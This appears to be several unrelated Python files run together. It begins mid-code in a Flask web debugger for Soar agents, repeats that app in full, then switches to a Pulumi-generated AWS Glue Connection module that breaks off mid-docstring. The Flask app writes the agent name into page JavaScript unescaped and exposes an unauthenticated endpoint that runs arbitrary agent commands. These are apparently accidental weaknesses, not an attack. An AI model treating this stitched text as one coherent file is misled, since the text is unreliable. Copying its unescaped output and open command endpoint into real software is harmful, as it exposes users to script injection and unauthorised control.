"name":c }, success:function(data) { ') js.append('if (data.result) {') js.append('$("#newName")[0].value="";') js.append('refreshList();') js.append('} else {') js.append('alert("Error creating agent!")') js.append('}') js.append('}});') js.append('});') js.append('refreshList();') js.append('});') _footer(doc, js) return _out(doc) @app.route("/create", methods=['POST']) def create(): global kernel global prints ret = { "result":False } if _has_needed_post(["name"]): ret["result"] = (kernel.CreateAgent(request.form["name"]) is not None) if ret["result"]: prints[request.form["name"]] = [] kernel.GetAgent(request.form["name"]).RegisterForPrintEvent(sml.smlEVENT_PRINT, callback_print_message, request.form["name"]) return json.dumps(ret) @app.route("/remove", methods=['POST']) def remove(): global kernel global prints ret = { "result":False } if _has_needed_post(["name"]): ret["result"] = kernel.DestroyAgent(kernel.GetAgent(request.form["name"])) if ret["result"]: prints.pop(request.form["name"]) return json.dumps(ret) @app.route("/agents", methods=['GET']) def agents(): global kernel ret = [] for i in range(kernel.GetNumberAgents()): ret.append(kernel.GetAgentByIndex(i).GetAgentName()) return json.dumps(ret) @app.route("/debug", methods=['GET']) def debug(): global kernel agent_name = request.args['agent'] agent = kernel.GetAgent(agent_name) doc = [] js = [] _header(doc, agent.GetAgentName()) doc.append('<div class="row">') ## doc.append('<div class="col-6">') doc.append('<div style="margin-bottom: 1rem"><form id="f1">') doc.append('<div class="form-row">') doc.append('<div class="col-9"><input type="text" class="form-control" id="cmd" value="" placeholder="Enter command" /></div>') doc.append('<div class="col"><input type="submit" class="btn btn-primary" id="go" value="Go!" /></div>') doc.append('<div class="col"><input type="button" class="btn btn-secondary" id="clear" value="Clear" /></div>') doc.append('</div>') doc.append('</form></div>') doc.append('<ul id="things" class="list-group">') doc.append('</ul>') doc.append('</div>') ## doc.append('<div class="col-6">') doc.append('<ul class="nav nav-tabs" id="myTab" role="tablist" style="margin-bottom: 1rem">') doc.append('<li class="nav-item"><a class="nav-link active" id="stack-tab" data-toggle="tab" href="#stack" role="tab" aria-controls="stack" aria-selected="true">State Stack</a></li>') doc.append('<li class="nav-item"><a class="nav-link" id="state-tab" data-toggle="tab" href="#state" role="tab" aria-controls="state" aria-selected="false">State</a></li>') doc.append('<li class="nav-item"><a class="nav-link" id="source-tab" data-toggle="tab" href="#source" role="tab" aria-controls="source" aria-selected="false">Source File</a></li>') doc.append('</ul>') ##### doc.append('<div class="tab-content" id="myTabContent">') doc.append('<div class="tab-pane show active" id="stack" role="tabpanel" aria-labelledby="stack-tab">') doc.append('<ul id="stackContent" class="list-group">') doc.append('</ul>') doc.append('</div>') doc.append('<div class="tab-pane" id="state" role="tabpanel" aria-labelledby="state-tab">') doc.append('<ul id="stateContent" class="list-group">') doc.append('</ul>') doc.append('</div>') doc.append('<div class="tab-pane" id="source" role="tabpanel" aria-labelledby="source-tab">') doc.append('<form id="f2">') doc.append('<div class="form-group">') doc.append('<label for="sourceFile">Upload Agent file</label>') doc.append('<input type="file" class="form-control-file" id="sourceFile">') doc.append('</div>') doc.append('<input type="submit" class="btn btn-primary" id="go" value="Upload" />') doc.append('</form>') doc.append('</div>') ##### doc.append('</div>') ## doc.append('</div>') js.append('var refreshList = [') js.append('["stackContent", "p --stack"],') js.append('["stateContent", "p -d 2 <s>"],') js.append('];') js.append('function refresh() {') js.append('for (var i=0; i<refreshList.length; i++) {') js.append('var r = refreshList[i];') js.append('var x = $("#" + r[0]);') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":r[1], "tag":i, "agent":"' + agent_name + '" }, success:function(data) { ') js.append('var r2 = refreshList[parseInt(data.tag)];') js.append('var x2 = $("#" + r2[0]);') js.append('x2.empty();') js.append('x2.append($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text(r2[1]), $("<pre></pre>").text(data.result)));') js.append('}});') js.append('}') js.append('}') js.append('$(document).ready (function() {') js.append('$("#clear").click(function(event) {') js.append('$("#things").empty();') js.append('});') js.append('$("#f1").submit(function(event) {') js.append('event.preventDefault();') js.append('var c = $("#cmd")[0].value;') js.append('if ($.trim(c).length > 0)') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":c, "print":"Y", "agent":"' + agent_name + '" }, success:function(data) { ') js.append('$("#things").prepend($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text(c), $("<pre></pre>").text(data.print), $("<pre></pre>").text(data.result)));') js.append('refresh();') js.append('}});') js.append('$("#cmd")[0].value = "";') js.append('$("#cmd")[0].focus();') js.append('});') js.append('$("#f2").submit(function(event) {') js.append('event.preventDefault();') js.append('var file = $("#sourceFile")[0].files[0];') js.append('var reader = new FileReader();') js.append('reader.onload = function (event) {') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":event.target.result, "print":"Y", "agent":"' + agent_name + '" }, success:function(data) { ') js.append('$("#things").prepend($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text("source " + $("#sourceFile")[0].files[0].name), $("<pre></pre>").text(data.print), $("<pre></pre>").text(data.result)));') js.append('$("#sourceFile")[0].value=null;') js.append('}});') js.append('};') js.append('reader.readAsText(file);') js.append('});') js.append('refresh();') js.append('});') _footer(doc, js) return _out(doc) @app.route("/do", methods=['POST']) def do(): global kernel global prints agent_name = request.form['agent'] agent = kernel.GetAgent(agent_name) ret = { "result":"", "print":"", "tag":"" } if _has_needed_post(["cmd"]): ret["result"] = agent.ExecuteCommandLine(request.form["cmd"]) if _has_needed_post(["print"]): ret["print"] = _out(prints[agent_name]) prints[agent_name].clear() if _has_needed_post(["tag"]): ret["tag"] = request.form["tag"] return json.dumps(ret) if __name__ == '__main__': app.run()
from flask import Flask, request, url_for app = Flask(__name__) import html import json ############################### ############################### import sys from os import environ as env sys.path.append(env['SOAR_HOME']) import Python_sml_ClientInterface as sml kernel = sml.Kernel_CreateKernelInCurrentThread(True, 0) prints = {} def callback_print_message(mid, user_data, agent, message): global prints prints[user_data].append(message.strip()) ############################### ############################### SITE_TITLE = 'Soar' def _out(l): return "\n".join(l) def _header(ret, title): ret.append('<!doctype html>') ret.append('<html lang="en">') ret.append('<head>') ret.append('<!-- Required meta tags -->') ret.append('<meta charset="utf-8">') ret.append('<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">') ret.append('<link href="{}" rel="stylesheet">'.format(url_for('static', filename="bootstrap.min.css"))) ret.append('<title>{} - {}</title>'.format(html.escape(SITE_TITLE), html.escape(title))) ret.append('<link rel="apple-touch-icon" sizes="57x57" href="{}">'.format(url_for('static', filename="apple-icon-57x57.png"))) ret.append('<link rel="apple-touch-icon" sizes="60x60" href="{}">'.format(url_for('static', filename="apple-icon-60x60.png"))) ret.append('<link rel="apple-touch-icon" sizes="72x72" href="{}">'.format(url_for('static', filename="apple-icon-72x72.png"))) ret.append('<link rel="apple-touch-icon" sizes="76x76" href="{}">'.format(url_for('static', filename="apple-icon-76x76.png"))) ret.append('<link rel="apple-touch-icon" sizes="114x114" href="{}">'.format(url_for('static', filename="apple-icon-114x114.png"))) ret.append('<link rel="apple-touch-icon" sizes="120x120" href="{}">'.format(url_for('static', filename="apple-icon-120x120.png"))) ret.append('<link rel="apple-touch-icon" sizes="144x144" href="{}">'.format(url_for('static', filename="apple-icon-144x144.png"))) ret.append('<link rel="apple-touch-icon" sizes="152x152" href="{}">'.format(url_for('static', filename="apple-icon-152x152.png"))) ret.append('<link rel="apple-touch-icon" sizes="180x180" href="{}">'.format(url_for('static', filename="apple-icon-180x180.png"))) ret.append('<link rel="icon" type="image/png" sizes="192x192" href="{}">'.format(url_for('static', filename="android-icon-192x192.png"))) ret.append('<link rel="icon" type="image/png" sizes="32x32" href="{}">'.format(url_for('static', filename="favicon-32x32.png"))) ret.append('<link rel="icon" type="image/png" sizes="96x96" href="{}">'.format(url_for('static', filename="favicon-96x96.png"))) ret.append('<link rel="icon" type="image/png" sizes="16x16" href="{}">'.format(url_for('static', filename="favicon-16x16.png"))) ret.append('<link rel="manifest" href="{}">'.format(url_for('static', filename="manifest.json"))) ret.append('<meta name="msapplication-TileColor" content="#ffffff">') ret.append('<meta name="msapplication-TileImage" content="{}">'.format(url_for('static', filename="ms-icon-144x144.png"))) ret.append('<meta name="theme-color" content="#ffffff">') ret.append('</head>') ret.append('<body>') ret.append('<div class="container">') ret.append('<h1>{}</h1>'.format(html.escape(title))) def _footer(ret, js=[]): ret.append('</div>') ret.append('<script src="{}"></script>'.format(url_for('static', filename='jquery-3.3.1.min.js'))) ret.append('<script src="{}"></script>'.format(url_for('static', filename='popper.min.js'))) ret.append('<script src="{}"></script>'.format(url_for('static', filename='bootstrap.min.js'))) ret.append('<script>') ret.append(_out(js)) ret.append('</script>') ret.append('</body>') ret.append('</html>') def _has_needed_post(l): for n in l: if n not in request.form: return False return True def _has_needed_get(l): for n in l: if n not in request.args: return False return True ############################### ############################### @app.route("/", methods=['POST', 'GET']) def hello(): global kernel doc = [] js = [] _header(doc, 'Home') doc.append('<hr />') doc.append('<div class="row" style="margin-bottom: 10px">') doc.append('<div class="col">') doc.append('<h2>New Agent</h2>') doc.append('<form id="fA">') doc.append('<div class="form-row">') doc.append('<div class="col-9"><input type="text" class="form-control" id="newName" value="" placeholder="Enter agent name" /></div>') doc.append('<div class="col"><input type="submit" class="btn btn-primary" id="create" value="create" /></div>') doc.append('</div>') doc.append('</form>') doc.append('</div>') doc.append('</div>') # doc.append('<div class="row">') doc.append('<div class="col">') doc.append('<h2>Existing Agents</h2>') doc.append('<div id="agents" class="card-columns">') doc.append('</div>') doc.append('</div>') doc.append('</div>') # doc.append('</div>') ## js.append('function refreshList() {') js.append('var agentList = $("#agents");') js.append('agentList.empty();') js.append('$.ajax({ url:"/agents", type: "GET", dataType: "json", data:{}, success:function(data) { ') js.append('for (i=0; i<data.length; i++) {') js.append('agentList.append($("<div></div>", {"class":"card"}).append($("<div></div>", {"class":"card-body"}).append([$("<h5></h5>", {"class":"card-title"}).text(data[i]), $("<a></a>", {"class":"btn btn-primary", "href":"/debug?agent="+data[i], "target":"_blank"}).text("debug"), $("<span></span>").text(" "), $("<button></button>", {"class":"btn btn-danger", "onclick":"removeAgent(\'" + data[i] + "\');"}).text("remove")])));') js.append('}') js.append('}});') js.append('}') js.append('function removeAgent(name) {') js.append('$.ajax({ url:"/remove", type: "POST", dataType: "json", data:{ "name":name }, success:function(data) { ') js.append('refreshList();') js.append('}});') js.append('}') js.append('$(document).ready (function() {') js.append('$("#fA").submit(function(event) {') js.append('event.preventDefault();') js.append('var c = $("#newName")[0].value;') js.append('if ($.trim(c).length > 0)') js.append('$.ajax({ url:"/create", type: "POST", dataType: "json", data:{ "name":c }, success:function(data) { ') js.append('if (data.result) {') js.append('$("#newName")[0].value="";') js.append('refreshList();') js.append('} else {') js.append('alert("Error creating agent!")') js.append('}') js.append('}});') js.append('});') js.append('refreshList();') js.append('});') _footer(doc, js) return _out(doc) @app.route("/create", methods=['POST']) def create(): global kernel global prints ret = { "result":False } if _has_needed_post(["name"]): ret["result"] = (kernel.CreateAgent(request.form["name"]) is not None) if ret["result"]: prints[request.form["name"]] = [] kernel.GetAgent(request.form["name"]).RegisterForPrintEvent(sml.smlEVENT_PRINT, callback_print_message, request.form["name"]) return json.dumps(ret) @app.route("/remove", methods=['POST']) def remove(): global kernel global prints ret = { "result":False } if _has_needed_post(["name"]): ret["result"] = kernel.DestroyAgent(kernel.GetAgent(request.form["name"])) if ret["result"]: prints.pop(request.form["name"]) return json.dumps(ret) @app.route("/agents", methods=['GET']) def agents(): global kernel ret = [] for i in range(kernel.GetNumberAgents()): ret.append(kernel.GetAgentByIndex(i).GetAgentName()) return json.dumps(ret) @app.route("/debug", methods=['GET']) def debug(): global kernel agent_name = request.args['agent'] agent = kernel.GetAgent(agent_name) doc = [] js = [] _header(doc, agent.GetAgentName()) doc.append('<div class="row">') ## doc.append('<div class="col-6">') doc.append('<div style="margin-bottom: 1rem"><form id="f1">') doc.append('<div class="form-row">') doc.append('<div class="col-9"><input type="text" class="form-control" id="cmd" value="" placeholder="Enter command" /></div>') doc.append('<div class="col"><input type="submit" class="btn btn-primary" id="go" value="Go!" /></div>') doc.append('<div class="col"><input type="button" class="btn btn-secondary" id="clear" value="Clear" /></div>') doc.append('</div>') doc.append('</form></div>') doc.append('<ul id="things" class="list-group">') doc.append('</ul>') doc.append('</div>') ## doc.append('<div class="col-6">') doc.append('<ul class="nav nav-tabs" id="myTab" role="tablist" style="margin-bottom: 1rem">') doc.append('<li class="nav-item"><a class="nav-link active" id="stack-tab" data-toggle="tab" href="#stack" role="tab" aria-controls="stack" aria-selected="true">State Stack</a></li>') doc.append('<li class="nav-item"><a class="nav-link" id="state-tab" data-toggle="tab" href="#state" role="tab" aria-controls="state" aria-selected="false">State</a></li>') doc.append('<li class="nav-item"><a class="nav-link" id="source-tab" data-toggle="tab" href="#source" role="tab" aria-controls="source" aria-selected="false">Source File</a></li>') doc.append('</ul>') ##### doc.append('<div class="tab-content" id="myTabContent">') doc.append('<div class="tab-pane show active" id="stack" role="tabpanel" aria-labelledby="stack-tab">') doc.append('<ul id="stackContent" class="list-group">') doc.append('</ul>') doc.append('</div>') doc.append('<div class="tab-pane" id="state" role="tabpanel" aria-labelledby="state-tab">') doc.append('<ul id="stateContent" class="list-group">') doc.append('</ul>') doc.append('</div>') doc.append('<div class="tab-pane" id="source" role="tabpanel" aria-labelledby="source-tab">') doc.append('<form id="f2">') doc.append('<div class="form-group">') doc.append('<label for="sourceFile">Upload Agent file</label>') doc.append('<input type="file" class="form-control-file" id="sourceFile">') doc.append('</div>') doc.append('<input type="submit" class="btn btn-primary" id="go" value="Upload" />') doc.append('</form>') doc.append('</div>') ##### doc.append('</div>') ## doc.append('</div>') js.append('var refreshList = [') js.append('["stackContent", "p --stack"],') js.append('["stateContent", "p -d 2 <s>"],') js.append('];') js.append('function refresh() {') js.append('for (var i=0; i<refreshList.length; i++) {') js.append('var r = refreshList[i];') js.append('var x = $("#" + r[0]);') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":r[1], "tag":i, "agent":"' + agent_name + '" }, success:function(data) { ') js.append('var r2 = refreshList[parseInt(data.tag)];') js.append('var x2 = $("#" + r2[0]);') js.append('x2.empty();') js.append('x2.append($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text(r2[1]), $("<pre></pre>").text(data.result)));') js.append('}});') js.append('}') js.append('}') js.append('$(document).ready (function() {') js.append('$("#clear").click(function(event) {') js.append('$("#things").empty();') js.append('});') js.append('$("#f1").submit(function(event) {') js.append('event.preventDefault();') js.append('var c = $("#cmd")[0].value;') js.append('if ($.trim(c).length > 0)') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":c, "print":"Y", "agent":"' + agent_name + '" }, success:function(data) { ') js.append('$("#things").prepend($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text(c), $("<pre></pre>").text(data.print), $("<pre></pre>").text(data.result)));') js.append('refresh();') js.append('}});') js.append('$("#cmd")[0].value = "";') js.append('$("#cmd")[0].focus();') js.append('});') js.append('$("#f2").submit(function(event) {') js.append('event.preventDefault();') js.append('var file = $("#sourceFile")[0].files[0];') js.append('var reader = new FileReader();') js.append('reader.onload = function (event) {') js.append('$.ajax({ url:"/do", type: "POST", dataType: "json", data:{ "cmd":event.target.result, "print":"Y", "agent":"' + agent_name + '" }, success:function(data) { ') js.append('$("#things").prepend($("<li></li>", { "class":"list-group-item" }).append($("<code></code>").text("source " + $("#sourceFile")[0].files[0].name), $("<pre></pre>").text(data.print), $("<pre></pre>").text(data.result)));') js.append('$("#sourceFile")[0].value=null;') js.append('}});') js.append('};') js.append('reader.readAsText(file);') js.append('});') js.append('refresh();') js.append('});') _footer(doc, js) return _out(doc) @app.route("/do", methods=['POST']) def do(): global kernel global prints agent_name = request.form['agent'] agent = kernel.GetAgent(agent_name) ret = { "result":"", "print":"", "tag":"" } if _has_needed_post(["cmd"]): ret["result"] = agent.ExecuteCommandLine(request.form["cmd"]) if _has_needed_post(["print"]): ret["print"] = _out(prints[agent_name]) prints[agent_name].clear() if _has_needed_post(["tag"]): ret["tag"] = request.form["tag"] return json.dumps(ret) if __name__ == '__main__': app.run()
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['ConnectionArgs', 'Connection'] @pulumi.input_type class ConnectionArgs: def __init__(__self__, *, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None): """ The set of arguments for constructing a Connection resource. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs'] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ if catalog_id is not None: pulumi.set(__self__, "catalog_id", catalog_id) if connection_properties is not None: pulumi.set(__self__, "connection_properties", connection_properties) if connection_type is not None: pulumi.set(__self__, "connection_type", connection_type) if description is not None: pulumi.set(__self__, "description", description) if match_criterias is not None: pulumi.set(__self__, "match_criterias", match_criterias) if name is not None: pulumi.set(__self__, "name", name) if physical_connection_requirements is not None: pulumi.set(__self__, "physical_connection_requirements", physical_connection_requirements) if tags is not None: pulumi.set(__self__, "tags", tags) if tags_all is not None: pulumi.set(__self__, "tags_all", tags_all) @property @pulumi.getter(name="catalogId") def catalog_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @catalog_id.setter def catalog_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "catalog_id", value) @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @connection_properties.setter def connection_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "connection_properties", value) @property @pulumi.getter(name="connectionType") def connection_type(self) -> Optional[pulumi.Input[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @connection_type.setter def connection_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "connection_type", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @match_criterias.setter def match_criterias(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "match_criterias", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the connection. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @physical_connection_requirements.setter def physical_connection_requirements(self, value: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]): pulumi.set(self, "physical_connection_requirements", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tagsAll") def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all") @tags_all.setter def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags_all", value) @pulumi.input_type class _ConnectionState: def __init__(__self__, *, arn: Optional[pulumi.Input[str]] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None): """ Input properties used for looking up and filtering Connection resources. :param pulumi.Input[str] arn: The ARN of the Glue Connection. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this connection. :param pulumi.Input[str] connection_type: The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. :param pulumi.Input[str] description: Description of the connection. :param pulumi.Input[Sequence[pulumi.Input[str]]] match_criterias: A list of criteria that can be used in selecting this connection. :param pulumi.Input[str] name: The name of the connection. :param pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs'] physical_connection_requirements: A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ if arn is not None: pulumi.set(__self__, "arn", arn) if catalog_id is not None: pulumi.set(__self__, "catalog_id", catalog_id) if connection_properties is not None: pulumi.set(__self__, "connection_properties", connection_properties) if connection_type is not None: pulumi.set(__self__, "connection_type", connection_type) if description is not None: pulumi.set(__self__, "description", description) if match_criterias is not None: pulumi.set(__self__, "match_criterias", match_criterias) if name is not None: pulumi.set(__self__, "name", name) if physical_connection_requirements is not None: pulumi.set(__self__, "physical_connection_requirements", physical_connection_requirements) if tags is not None: pulumi.set(__self__, "tags", tags) if tags_all is not None: pulumi.set(__self__, "tags_all", tags_all) @property @pulumi.getter def arn(self) -> Optional[pulumi.Input[str]]: """ The ARN of the Glue Connection. """ return pulumi.get(self, "arn") @arn.setter def arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "arn", value) @property @pulumi.getter(name="catalogId") def catalog_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. """ return pulumi.get(self, "catalog_id") @catalog_id.setter def catalog_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "catalog_id", value) @property @pulumi.getter(name="connectionProperties") def connection_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of key-value pairs used as parameters for this connection. """ return pulumi.get(self, "connection_properties") @connection_properties.setter def connection_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "connection_properties", value) @property @pulumi.getter(name="connectionType") def connection_type(self) -> Optional[pulumi.Input[str]]: """ The type of the connection. Supported are: `JDBC`, `MONGODB`, `KAFKA`, and `NETWORK`. Defaults to `JBDC`. """ return pulumi.get(self, "connection_type") @connection_type.setter def connection_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "connection_type", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Description of the connection. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="matchCriterias") def match_criterias(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A list of criteria that can be used in selecting this connection. """ return pulumi.get(self, "match_criterias") @match_criterias.setter def match_criterias(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "match_criterias", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the connection. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="physicalConnectionRequirements") def physical_connection_requirements(self) -> Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]: """ A map of physical connection requirements, such as VPC and SecurityGroup. Defined below. """ return pulumi.get(self, "physical_connection_requirements") @physical_connection_requirements.setter def physical_connection_requirements(self, value: Optional[pulumi.Input['ConnectionPhysicalConnectionRequirementsArgs']]): pulumi.set(self, "physical_connection_requirements", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Key-value map of resource tags. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tagsAll") def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block). """ return pulumi.get(self, "tags_all") @tags_all.setter def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "tags_all", value) class Connection(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, catalog_id: Optional[pulumi.Input[str]] = None, connection_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, connection_type: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, match_criterias: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, physical_connection_requirements: Optional[pulumi.Input[pulumi.InputType['ConnectionPhysicalConnectionRequirementsArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None): """ Provides a Glue Connection resource. ## Example Usage ### Non-VPC Connection ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": "jdbc:mysql://example.com/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }) ``` ### VPC Connection For more information, see the [AWS Documentation](https://docs.aws.amazon.com/glue/latest/dg/populate-add-connection.html#connection-JDBC-VPC). ```python import pulumi import pulumi_aws as aws example = aws.glue.Connection("example", connection_properties={ "JDBC_CONNECTION_URL": f"jdbc:mysql://{aws_rds_cluster["example"]["endpoint"]}/exampledatabase", "PASSWORD": "examplepassword", "USERNAME": "exampleusername", }, physical_connection_requirements=aws.glue.ConnectionPhysicalConnectionRequirementsArgs( availability_zone=aws_subnet["example"]["availability_zone"], security_group_id_lists=[aws_security_group["example"]["id"]], subnet_id=aws_subnet["example"]["id"], )) ``` ## Import Glue Connections can be imported using the `CATALOG-ID` (AWS account ID if not custom) and `NAME`, e.g. ```sh $ pulumi import aws:glue/connection:Connection MyConnection 123456789012:MyConnection ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] catalog_id: The ID of the Data Catalog in which to create the connection. If none is supplied, the AWS account ID is used by default. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] connection_properties: A map of key-value pairs used as parameters for this 